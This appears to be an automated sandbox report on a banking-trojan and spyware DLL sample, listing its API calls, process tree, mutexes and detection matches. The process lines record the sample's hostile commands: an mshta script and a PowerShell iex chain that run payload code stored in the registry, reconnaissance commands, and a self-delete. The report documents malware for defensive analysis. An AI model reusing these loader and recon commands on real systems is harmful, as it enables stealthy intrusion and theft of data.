Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE44A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	4_2_05DE44A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE5CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	4_2_05DE5CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD1C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	4_2_05DD1C78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DDCF88 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	4_2_05DDCF88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DEB628 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05DEB628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	4_2_05DE312E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DF12F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_05DF12F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	4_2_05DE264B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DEC1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05DEC1C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE5188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	4_2_05DE5188
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD29B2 NtGetContextThread,RtlNtStatusToDosError,	4_2_05DD29B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DDA085 memset,NtQueryInformationProcess,	4_2_05DDA085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE5830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	4_2_05DE5830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD1B92 NtQuerySystemInformation,RtlNtStatusToDosError,	4_2_05DD1B92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD7A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	4_2_05DD7A1E
Source: C:\Windows\System32\control.exe	Code function: 26_2_009410B4 NtMapViewOfSection,	26_2_009410B4
Source: C:\Windows\System32\control.exe	Code function: 26_2_009379AC NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	26_2_009379AC
Source: C:\Windows\System32\control.exe	Code function: 26_2_009359D4 NtCreateSection,	26_2_009359D4
Source: C:\Windows\System32\control.exe	Code function: 26_2_009332C0 RtlAllocateHeap,NtQueryInformationProcess,	26_2_009332C0
Source: C:\Windows\System32\control.exe	Code function: 26_2_00932B58 NtWriteVirtualMemory,	26_2_00932B58
Source: C:\Windows\System32\control.exe	Code function: 26_2_00957DB4 NtQueryInformationToken,NtQueryInformationToken,NtClose,	26_2_00957DB4
Source: C:\Windows\System32\control.exe	Code function: 26_2_00938D20 NtSetContextThread,NtUnmapViewOfSection,NtClose,	26_2_00938D20
Source: C:\Windows\System32\control.exe	Code function: 26_2_00957D48 NtQueryInformationProcess,	26_2_00957D48
Source: C:\Windows\System32\control.exe	Code function: 26_2_00953FD4 NtAllocateVirtualMemory,	26_2_00953FD4
Source: C:\Windows\System32\control.exe	Code function: 26_2_00944F74 NtReadVirtualMemory,	26_2_00944F74
Source: C:\Windows\System32\control.exe	Code function: 26_2_0096E011 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_0096E011
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77767DB4 NtQueryInformationToken,NtQueryInformationToken,NtClose,	40_2_0000028A77767DB4
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77767D48 NtQueryInformationProcess,	40_2_0000028A77767D48
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7777E011 NtProtectVirtualMemory,NtProtectVirtualMemory,	40_2_0000028A7777E011

Source: d6YCUW421p.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220422

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winDLL@77/41@6/5

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: RuntimeBroker.exe, 0000002E.00000000.662112672.000001EF3603C000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.643755136.000001EF3603C000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.667351916.000001EF3603C000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.629748643.000001EF3603C000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895031811.000001EF36050000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: em.Sln

Source: d6YCUW421p.dll	Virustotal: Detection: 36%
Source: d6YCUW421p.dll	ReversingLabs: Detection: 33%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 604
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 612
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 640
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qq47='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qq47).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5B2D.tmp" "c:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\d6YCUW421p.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5B2D.tmp" "c:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\d6YCUW421p.dll
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6B3A.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\DFA5.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F47.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB6DB6 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,

4_2_04AB6DB6

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{00582389-5F6B-3241-E934-03862DA8E71A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C093CB03-1FF4-F2B2-A9F4-C346ED68A7DA}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C848BE84-8755-3A15-517C-AB0E15700F22}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7CF43CAB-ABC5-0E1F-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess408
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_01

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: d6YCUW421p.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.501612417.0000000006390000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.495117008.0000000006390000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000002.00000000.368230148.0000000000480000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000004.00000003.501612417.0000000006390000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.495117008.0000000006390000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04ABB2FF push esi; retf	4_2_04ABB301
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB7E20 push ecx; ret	4_2_04AB7E29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB820B push ecx; ret	4_2_04AB821B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE2C1A push ecx; mov dword ptr [esp], 00000002h	4_2_05DE2C1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DF37E3 push ecx; ret	4_2_05DF37F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DF32B0 push ecx; ret	4_2_05DF32B9

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_05DDA513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_05DDA513

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline	Jump to behavior

Source: vqkyohgm.dll.22.dr	Static PE information: real checksum: 0x0 should be: 0x1e36
Source: d6YCUW421p.dll	Static PE information: real checksum: 0x872fe521 should be: 0xa456f
Source: g2letrfe.dll.25.dr	Static PE information: real checksum: 0x0 should be: 0x1e57

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hooks registry keys query functions (used to hide registry keys)

Source: Yara match	File source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
